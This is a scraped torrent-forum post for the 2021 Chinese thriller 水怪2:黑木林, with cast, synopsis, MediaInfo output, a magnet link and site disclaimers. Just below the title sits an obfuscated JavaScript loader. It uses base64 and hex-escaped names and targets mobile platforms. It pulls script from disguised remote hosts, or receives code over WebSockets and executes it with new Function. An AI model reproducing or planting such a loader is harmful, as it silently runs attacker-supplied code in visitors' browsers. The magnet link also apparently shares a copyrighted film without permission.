水怪2黑木林[国语中字].Shui.Guai.II.2021.2160p.WEB-DL.H265.AAC 2.85GB

版主小s 1月前 637

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 水怪2:黑木林 / 水怪2
◎年  代 2021
◎产  地 中国大陆
◎类  别 悬疑 / 惊悚
◎语  言 汉语普通话
◎上映日期 2021-08-20(中国大陆)
◎IMDb链接 https://www.imdb.com/title//
◎豆瓣链接 https://movie.douban.com/subject/35132915/
◎片  长 84分钟
◎导  演 项秋良 Qiuliang Xiang (id:1384965)
       项河生 Hesheng Xiang (id:1384967)
◎编  剧 简士耕 Shi-Geng Jian (id:1320960)
◎演  员 王真儿 Zhen'er Wang (id:1346550)
       韩栋 Dong Han (id:1315429)
       王滋润 Zirun Wang (id:1364183)
       魏子淇 Ziqi Wei (id:1386824)

◎标  签 恐怖 / 惊悚 / 悬疑 / 恐怖片 / 中国 / 中国大陆 / 2021影院观看 / 网剧

◎简  介
  弟弟杜家豪(韩栋 饰)在上水镇被水猴子残杀,民国女法医清伶(王真儿 饰)为了探寻真相只得前往上水镇一探究竟。远僻冷清隐露诡异的村庄,关于水猴子复仇的“诅咒”接二连三印验。勇敢果决的清伶扛枪勇闯水怪禁地——黑木林,而这一切因果是非似乎早已命中注定……

  1. ##### MediaInfo ######

  2. General

  3. Complete name                            : 水怪2黑木林[email protected]

  4. Format                                   : MPEG-4

  5. Format profile                           : Base Media

  6. Codec ID                                 : isom (isom/iso2/mp41)

  7. File size                                : 2.85 GiB

  8. Duration                                 : 1 h 24 min

  9. Overall bit rate                         : 4 827 kb/s

  10. Writing application                      : Lavf58.38.101


  11. Video

  12. ID                                       : 1

  13. Format                                   : HEVC

  14. Format/Info                              : High Efficiency Video Coding

  15. Format profile                           : [email protected]@Main

  16. Codec ID                                 : hev1

  17. Codec ID/Info                            : High Efficiency Video Coding

  18. Duration                                 : 1 h 24 min

  19. Bit rate                                 : 4 631 kb/s

  20. Width                                    : 3 840 pixels

  21. Height                                   : 1 640 pixels

  22. Display aspect ratio                     : 2.35:1

  23. Frame rate mode                          : Constant

  24. Frame rate                               : 24.000 FPS

  25. Color space                              : YUV

  26. Chroma subsampling                       : 4:2:0

  27. Bit depth                                : 8 bits

  28. Bits/(Pixel*Frame)                       : 0.031

  29. Stream size                              : 2.73 GiB (96%)

  30. Codec configuration box                  : hvcC


  31. Audio

  32. ID                                       : 2

  33. Format                                   : AAC LC

  34. Format/Info                              : Advanced Audio Codec Low Complexity

  35. Codec ID                                 : mp4a-40-2

  36. Duration                                 : 1 h 24 min

  37. Bit rate mode                            : Constant

  38. Bit rate                                 : 192 kb/s

  39. Channel(s)                               : 2 channels

  40. Channel layout                           : L R

  41. Sampling rate                            : 44.1 kHz

  42. Frame rate                               : 43.066 FPS (1024 SPF)

  43. Compression mode                         : Lossy

  44. Stream size                              : 115 MiB (4%)

  45. Default                                  : Yes

  46. Alternate group                          : 1



TAGS 惊悚 悬疑

磁力链:
  • magnet:?xt=urn:btih:38B47E9829B3C25A31D7DC3C7C0544D4EF4F1A3E
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖